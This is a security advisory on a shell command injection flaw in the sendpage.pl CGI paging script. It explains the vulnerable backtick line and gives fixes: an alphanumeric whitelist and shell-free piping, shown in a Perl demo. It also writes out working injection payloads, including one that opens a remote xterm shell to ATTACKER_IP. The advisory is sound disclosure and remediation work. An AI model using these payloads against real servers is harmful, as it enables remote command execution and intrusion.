The sendpage.pl program reads its input from ordinary HTML forms, does some work, and then pipes a string to a user-defined executable that sends that information as a page (page in the telecommunications sense) to the intended recipient. Because the user-supplied message is interpolated unescaped into a shell command line, an attacker can execute arbitrary commands with the privileges of the web server.
Credit:
The information has been provided by Pedram Amini and John Imrie.
The offending line of code that allows us to execute our own command is found on line 68:
68: { $ret=`/bin/echo \"$message\" | $pcmd`; }
Examining the script shows that aside from basic URL decoding (lines 30 and 31) no further parsing is done on $message. Since the backtick operator hands the whole interpolated string to /bin/sh, every shell metacharacter in $message is honoured. So what can we do with this? We can close the echo argument with a double quote, run our own command, and then start a new echo whose closing quote we never write, so that the `" | $pcmd` left over from the original line completes it and the command line still parses. In essence:
test"; OUR COMMAND; echo "message
As an example, go to the form page, choose a recipient, and enter the following as your message:
test"; touch /tmp/blah; echo "message
Assuming /tmp/blah did not exist before, it does now. Spawning a shell with the permissions of the web server is as simple as pointing an xterm at an X server you control (the web server must be able to reach ATTACKER_IP, and that X server must accept the connection):
test"; sh -c 'xterm -display ATTACKER_IP:0.0 &'; echo "message
Fix:
One approach is to filter out all "dangerous" shell metacharacters: ,';"/`\%$#{}-&<>... but a blacklist of this kind is easy to get wrong and has to be revisited whenever the command line changes.
We prefer to keep things simple and remove all non-alphanumeric characters:
$message =~ s/[^A-Za-z0-9]//g;
Note that this also strips spaces and punctuation, so pages arrive as a single run of letters and digits; widen the whitelist deliberately if that matters. Either filter only treats the symptom, though: the root cause is that $message is built into a shell command string at all. The robust fix is to run $pcmd without a shell and write the message to its standard input, where it is plain data.
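The following Perl script is an added example and is not code from sendpage.pl or from the advisory's authors. It reproduces the line-68 construction in a stand-alone function, beside a replacement that invokes the pager command with the list form of open so that no shell ever sees $message, plus the advisory's whitelist widened to keep spaces and basic punctuation. The function names, the widened character set, the INJECTED marker payload and the use of cat as a stand-in for the user-defined pager command are assumptions made for this example.

```perl
#!/usr/bin/perl
# Added example (not sendpage.pl's own code): the injectable construction
# from line 68 next to a version that never hands $message to a shell.
# `cat` stands in for the user-defined pager command (assumption).
use strict;
use warnings;

$| = 1;   # unbuffered STDOUT so our headers and cat's output stay in order

# Equivalent of line 68. The backtick operator passes the interpolated
# string to /bin/sh, so a double quote in $message ends the echo argument
# and whatever follows it is run as a separate command.
sub send_page_vulnerable {
    my ($message, $pcmd) = @_;
    my $ret = `/bin/echo \"$message\" | $pcmd`;
    return $ret;
}

# Replacement. The list form of open (Perl 5.8+) runs the program directly
# and gives us a pipe to its stdin; $message is written as data and is never
# part of any command line, so shell metacharacters in it are inert.
sub send_page_safe {
    my ($message, @pcmd) = @_;   # program path followed by its own arguments
    open(my $pager, '|-', @pcmd) or die "cannot run $pcmd[0]: $!";
    print {$pager} "$message\n";
    close($pager) or warn "$pcmd[0] exited with status " . ($? >> 8) . "\n";
    return $? >> 8;              # exit status of the pager command
}

# Defence in depth: the advisory's whitelist, widened (assumption) to keep
# the spaces and basic punctuation a readable page needs.
sub sanitize_message {
    my ($message) = @_;
    $message =~ s/[^A-Za-z0-9 .,:?!-]//g;
    return $message;
}

# Constructed payload with the advisory's shape: close the quote, run a
# command, reopen a quote so the trailing `" | $pcmd` still parses.
my $payload = 'test"; echo INJECTED; echo "message';

print "--- vulnerable: output captured from the whole pipeline ---\n";
print send_page_vulnerable($payload, 'cat');   # INJECTED appears on its own line

print "--- safe: cat prints exactly the bytes it was given ---\n";
send_page_safe($payload, 'cat');               # the payload comes back verbatim

print "--- sanitized ---\n";
print sanitize_message($payload), "\n";        # test echo INJECTED echo message
```

Run it on any Unix host with /bin/echo and cat present. In the vulnerable run the captured output contains INJECTED as a line of its own, proving the second command executed; in the safe run cat simply reproduces the quoted payload, because the message reached it on stdin rather than through sh. Keep the whitelist as a second layer, not as the fix: the list-form open is what removes the shell from the path.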